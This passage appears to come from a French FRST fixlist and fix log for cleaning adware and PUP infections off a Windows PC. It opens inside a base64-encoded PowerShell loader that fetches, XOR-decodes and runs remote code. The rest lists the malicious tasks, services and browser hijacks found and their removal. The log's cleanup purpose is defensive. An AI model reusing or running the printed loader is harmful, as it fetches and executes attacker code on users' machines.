RQA3AEEANAA3AC0AMABCADAAQwAtADAARgAwADgALQAwAEEAMQAxAC0ANwA5ADAARAA3AEYAMABBADEAMQA3ADgAfQAiADsAJABwAHIAaQBkAD0AIgBEAE4AUwBVAG4AbABvAGMAawBlAHIAIgA7ACQAaQBuAGkAZAA9ACIARwBWAEwAUABMAE0AVQBJACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA

Task: {2E995896-1403-4B3C-A0CE-08E2CC86CEC8} - System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74} => pcalua.exe -a C:\ProgramData\Boxore\7.1\Boxore.exe -c --uninstall --finalize --prompt --self-clear --no-loop

Task: {3CE8C7EC-A295-4302-9FFB-ACE57B8A963E} - System32\Tasks\{58FDE6D7-A507-4423-B1CD-66DFA0C6118A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UN0CJUNZ\Range_RAT5_SD7_0_20_0_32Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop

Task: {734C3AC7-651B-4352-996F-F7C109F3701A} - System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB} => pcalua.exe -a C:\ProgramData\HealthAlert\uninstall.exe -c /kb=y /ic=1

Task: {7A303B39-7CDA-4A1E-9891-0A011C6E1469} - System32\Tasks\{4FD1D25B-8F85-4B36-9D41-19E3BCE1E189} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs

Task: {83EF2014-E426-471A-8F68-9F3703DC3386} - System32\Tasks\{21ED9E85-E8AF-45E2-97A9-25CC8F78086A} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OZXP1FQ7\Range_RAT5_SD7_0_20_0_64Bit_Drivers_NonWHQL.exe" -d C:\Users\S\Desktop

Task: {9193837B-FC9A-4313-BBD2-EB2A8A277FC4} - System32\Tasks\{8DD57CC7-894A-4ED9-AB4F-2AC8F3A8E607} => pcalua.exe -a C:\Users\S\AppData\Roaming\mystartsearch\UninstallManager.exe -c -ptid=smt

Task: {96BA2B19-8421-47E0-AEBE-CD20ADC97CCE} - System32\Tasks\SMWUpd => C:\Program Files\Common Files\Goobzo\GBUpdate\updatehelper.exe

Task: {DF37F4BC-4105-4B00-B85F-9780A2B2AD6B} - System32\Tasks\{E75605B3-C286-4A31-B8ED-8867D2947E21} => pcalua.exe -a "C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LGVVN9I5\logitech_logitech_setpoint_vista_4.70_4005.exe" -d C:\Users\S\Desktop

Task: {FD9906E6-A57B-4828-8351-3EAC75386662} - System32\Tasks\{A400D9BF-35AA-4908-A12C-26F78BFA9C0E} => pcalua.exe -a C:\Users\S\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=tugs

ShortcutWithArgument: C:\Users\S\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G1Vzbwybl01,018946f8-eaae-4b0e-982f-6bfe16626fb9,

AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52c-c805-11e5-ae75-bcee7b86f8d3}

AlternateDataStreams: C:\Windows\system32\Drivers\sdfhgdf.sys:{2755e52d-c805-11e5-ae75-bcee7b86f8d3}

AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\zcengine => ""="service"

IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\localhost -> localhost

IE trusted site: HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\...\webcompanion.com -> hxxp://webcompanion.com

Hosts:

EmptyTemp:

end
*****************

Erreur: Un point de restauration ne peut être créé qu'en mode normal.
Processus fermé avec succès.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mbot_fr_163 => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\oasi_en_062020224 => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\rec_en_77 => valeur supprimé(es) avec succès
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\sun3 => valeur supprimé(es) avec succès
"C:\ProgramData\caMyciloP\Lotlamfresh.dll" => Données de la valeur supprimé(es) avec succès.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => clé supprimé(es) avec succès
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => clé non trouvé(e).
C:\Windows\system32\GroupPolicy\Machine => déplacé(es) avec succès
C:\Windows\system32\GroupPolicy\GPT.ini => déplacé(es) avec succès
"HKLM\SOFTWARE\Policies\Google" => clé supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\\NameServer => valeur supprimé(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => valeur restauré(es) avec succès
HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => valeur restauré(es) avec succès
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => valeur restauré(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch" => clé supprimé(es) avec succès
HKCR\Wow6432Node\CLSID\ielnksrch => clé non trouvé(e).
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4efb-9B51-7695ECA05670}" => clé supprimé(es) avec succès
HKCR\Wow6432Node\CLSID\{02478D38-C3F9-4efb-9B51-7695ECA05670} => clé non trouvé(e).
Firefox "newtab" supprimé(es) avec succès
Firefox DefaultSearchEngine supprimé(es) avec succès
Firefox "homepage" supprimé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\user.js => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bing-lavasoft.xml => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\bingcom.xml => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\searchplugins\findit.xml => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\duplicate-this-tab@mozilla.org => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Mozilla\Firefox\Profiles\prrb21uk.default\Extensions\wrigtdamon@yahoo.com => déplacé(es) avec succès
HKLM\Software\Mozilla\Firefox\Extensions\\{552214C7-0E89-4D62-99BF-692DF251F6CE} => valeur supprimé(es) avec succès
HKLM\Software\Mozilla\Firefox\Extensions\\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE} => valeur supprimé(es) avec succès
HKLM\Software\Mozilla\Firefox\Extensions\\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9} => valeur supprimé(es) avec succès
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{552214C7-0E89-4D62-99BF-692DF251F6CE} => valeur supprimé(es) avec succès
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{794D2E20-F319-4F6D-83F3-7A6899A0A3EE} => valeur supprimé(es) avec succès
HKLM\Software\Wow6432Node\Mozilla\Firefox\Extensions\\{23BB450D-DE1A-48A0-b2F1-BF297E6FFEE9} => valeur supprimé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\dfjohdhhdfnbnleaagegogfdfgkbfgcg => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap => déplacé(es) avec succès
C:\Users\S\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda => déplacé(es) avec succès
"HKLM\SOFTWARE\Google\Chrome\Extensions\fcgnigmofekcllgbiejhmigggmgehkip" => clé supprimé(es) avec succès
"HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\SOFTWARE\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fcgnigmofekcllgbiejhmigggmgehkip" => clé supprimé(es) avec succès
pKmAVFr => service supprimé(es) avec succès
WajaNetEn Monitor => service supprimé(es) avec succès
cherimoya => Impossible d'arrêter le service.
cherimoya => service supprimé(es) avec succès
{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64 => Service arrêté avec succès.
{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64 => service supprimé(es) avec succès
SMUpdd => service supprimé(es) avec succès
tbfd_1_10_0_16 => service supprimé(es) avec succès
C:\Windows\SysWOW64\trz6EE9.tmp => déplacé(es) avec succès
C:\Windows\system32\trz3C0.tmp => déplacé(es) avec succès
C:\Program Files\Common Files\AV => déplacé(es) avec succès
C:\ProgramData\AVAST Software => déplacé(es) avec succès
C:\Windows\System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178} => déplacé(es) avec succès
C:\ProgramData\8b3e0aeb-25d7-1 => déplacé(es) avec succès
C:\ProgramData\8b3e0aeb-00e7-0 => déplacé(es) avec succès
C:\ZombieNews => déplacé(es) avec succès
C:\Users\S\AppData\Local\HealthAlert => déplacé(es) avec succès
C:\ProgramData\Browser => déplacé(es) avec succès
C:\Windows\SysWOW64\zcengineOff.ini => déplacé(es) avec succès
C:\Windows\system32\zcengineOff.ini => déplacé(es) avec succès
C:\Windows\System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB} => déplacé(es) avec succès
C:\Program Files (x86)\Exploremedia => déplacé(es) avec succès
C:\ProgramData\caMyciloP => déplacé(es) avec succès
C:\ProgramData\caMyciloPs => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\systweak => déplacé(es) avec succès
C:\Windows\system32\roboot64.exe => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Opera Software => déplacé(es) avec succès
C:\Users\S\AppData\Local\Opera Software => déplacé(es) avec succès
C:\Program Files (x86)\Opera => déplacé(es) avec succès
C:\ProgramData\QpHsgPX => déplacé(es) avec succès
C:\ProgramData\PlayGemConfig => déplacé(es) avec succès
C:\Program Files (x86)\QuickSearch => déplacé(es) avec succès
C:\Users\S\AppData\Local\ZombieNews => déplacé(es) avec succès
C:\Windows\system32\LavasoftTcpService64.dll => déplacé(es) avec succès
C:\Windows\SysWOW64\LavasoftTcpService.dll => déplacé(es) avec succès
C:\Windows\SysWOW64\LavasoftTcpServiceOff.ini => déplacé(es) avec succès
C:\Windows\system32\LavasoftTcpServiceOff.ini => déplacé(es) avec succès
C:\Prefs.js => déplacé(es) avec succès
C:\searchplugins => déplacé(es) avec succès
C:\END => déplacé(es) avec succès
C:\Windows\system32\Drivers\cherimoya.sys => déplacé(es) avec succès
C:\Program Files\WajaNetEn => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\TutofQesgifo => déplacé(es) avec succès
C:\Users\S\AppData\Local\Tempfolder => déplacé(es) avec succès
C:\Windows\System32\Tasks\Thufihaz => déplacé(es) avec succès
C:\Windows\system32\enet => déplacé(es) avec succès
C:\ProgramData\Rlusuafoosha => déplacé(es) avec succès
C:\Program Files (x86)\5CAFBB60-1454257034-11DD-BEB1-BCEE7B86F8D3 => déplacé(es) avec succès
C:\Windows\system32\Drivers\{28732d35-3deb-4a02-82b2-301e83b4aecb}Gw64.sys => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk => déplacé(es) avec succès
C:\Windows\System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74} => déplacé(es) avec succès
C:\Program Files\shopperz310120161627 => déplacé(es) avec succès
C:\Users\S\AppData\Local\SearchModule => déplacé(es) avec succès
C:\Windows\system32\Drivers\sdfhgdf.sys => déplacé(es) avec succès
C:\Windows\System32\Tasks\SMWUpd => déplacé(es) avec succès
C:\Windows\System32\Tasks\Tofze => déplacé(es) avec succès
C:\Users\S\AppData\LocalLow\Company => déplacé(es) avec succès
C:\Users\S\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} => déplacé(es) avec succès
C:\uninst => déplacé(es) avec succès
C:\ProgramData\SearchModule => déplacé(es) avec succès
C:\Users\S\AppData\Local\5CAFBB60-1454259509-11DD-BEB1-BCEE7B86F8D3 => déplacé(es) avec succès
C:\Program Files (x86)\5CAFBB60-1454255842-11DD-BEB1-BCEE7B86F8D3 => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\WTools => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Store => déplacé(es) avec succès
C:\Windows\system32\Drivers\etc\hp.bak => déplacé(es) avec succès
C:\ProgramData\aGKpCJK => déplacé(es) avec succès
C:\ProgramData\ApplicationHosting => déplacé(es) avec succès
C:\Program Files\BitTorrent => déplacé(es) avec succès
C:\ProgramData\Boxore => déplacé(es) avec succès
C:\Windows\SysWOW64\BoxoreServiceOff.ini => déplacé(es) avec succès
C:\Windows\system32\BoxoreServiceOff.ini => déplacé(es) avec succès
C:\Windows\SysWOW64\findit.xml => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Nosibay => déplacé(es) avec succès
C:\Users\S\AppData\Local\Boxore => déplacé(es) avec succès
C:\Users\S\AppData\Local\Villalab.dat => déplacé(es) avec succès
C:\Users\S\AppData\Local\Villalab.exe.config => déplacé(es) avec succès
C:\ProgramData\Medlights => déplacé(es) avec succès
C:\Windows\SysWOW64\BoxoreService.dll => déplacé(es) avec succès
C:\Program Files\Sound+ => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Bubble Dock.boostrap.log => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Bubble Dock.installation.log => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\Selection Tools.installation.log => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\WindApp.boostrap.log => déplacé(es) avec succès
C:\Users\S\AppData\Roaming\WindApp.installation.log => déplacé(es) avec succès
"C:\Program Files\Common Files\Goobzo" => non trouvé(e).
"C:\Program Files\shopperz310120161636" => non trouvé(e).
"C:\Program Files\shopperz310120161915" => non trouvé(e).
"C:\Users\S\AppData\Roaming\mystartsearch" => non trouvé(e).
"C:\Users\S\AppData\Roaming\omiga-plus" => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{038ECAE5-4F59-4163-B023-594620E942DF}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{038ECAE5-4F59-4163-B023-594620E942DF}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\Tofze => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Tofze" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0EEA080F-5E45-41D8-B3D3-AFF16F13795F}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0EEA080F-5E45-41D8-B3D3-AFF16F13795F}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178} => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7F7E7A47-0B0C-0F08-0A11-790D7F0A1178}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2E995896-1403-4B3C-A0CE-08E2CC86CEC8}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E995896-1403-4B3C-A0CE-08E2CC86CEC8}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74} => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C8C5A7B0-140E-4DB7-AE8F-8DAA32E87B74}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{3CE8C7EC-A295-4302-9FFB-ACE57B8A963E}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3CE8C7EC-A295-4302-9FFB-ACE57B8A963E}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{58FDE6D7-A507-4423-B1CD-66DFA0C6118A} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{58FDE6D7-A507-4423-B1CD-66DFA0C6118A}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{734C3AC7-651B-4352-996F-F7C109F3701A}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{734C3AC7-651B-4352-996F-F7C109F3701A}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB} => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{1F4A89EC-573E-4BEA-8104-7FC6597AC0DB}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A303B39-7CDA-4A1E-9891-0A011C6E1469}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A303B39-7CDA-4A1E-9891-0A011C6E1469}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{4FD1D25B-8F85-4B36-9D41-19E3BCE1E189} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{4FD1D25B-8F85-4B36-9D41-19E3BCE1E189}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{83EF2014-E426-471A-8F68-9F3703DC3386}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83EF2014-E426-471A-8F68-9F3703DC3386}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{21ED9E85-E8AF-45E2-97A9-25CC8F78086A} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{21ED9E85-E8AF-45E2-97A9-25CC8F78086A}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{9193837B-FC9A-4313-BBD2-EB2A8A277FC4}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{9193837B-FC9A-4313-BBD2-EB2A8A277FC4}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{8DD57CC7-894A-4ED9-AB4F-2AC8F3A8E607} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{8DD57CC7-894A-4ED9-AB4F-2AC8F3A8E607}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{96BA2B19-8421-47E0-AEBE-CD20ADC97CCE}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{96BA2B19-8421-47E0-AEBE-CD20ADC97CCE}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\SMWUpd => non trouvé(e).
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMWUpd" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DF37F4BC-4105-4B00-B85F-9780A2B2AD6B}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DF37F4BC-4105-4B00-B85F-9780A2B2AD6B}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{E75605B3-C286-4A31-B8ED-8867D2947E21} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{E75605B3-C286-4A31-B8ED-8867D2947E21}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FD9906E6-A57B-4828-8351-3EAC75386662}" => clé supprimé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FD9906E6-A57B-4828-8351-3EAC75386662}" => clé supprimé(es) avec succès
C:\Windows\System32\Tasks\{A400D9BF-35AA-4908-A12C-26F78BFA9C0E} => déplacé(es) avec succès
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{A400D9BF-35AA-4908-A12C-26F78BFA9C0E}" => clé supprimé(es) avec succès
C:\Users\S\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk => Raccourci argument supprimé(es) avec succès.
"C:\Windows\system32\Drivers\sdfhgdf.sys" => ":{2755e52c-c805-11e5-ae75-bcee7b86f8d3}" ADS non trouvé(e).
"C:\Windows\system32\Drivers\sdfhgdf.sys" => ":{2755e52d-c805-11e5-ae75-bcee7b86f8d3}" ADS non trouvé(e).
C:\ProgramData\TEMP => ":CB0AACC9" ADS supprimé(es) avec succès.
"HKLM\System\CurrentControlSet\Control\SafeBoot\Network\zcengine" => clé supprimé(es) avec succès
"HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\localhost" => clé supprimé(es) avec succès
"HKU\S-1-5-21-3611895705-2825658656-1871142997-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com" => clé supprimé(es) avec succès
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
EmptyTemp: => 311.9 MB données temporaires supprimées.


Le système a dû redémarrer.

==== Fin de Fixlog 09:54:36 ====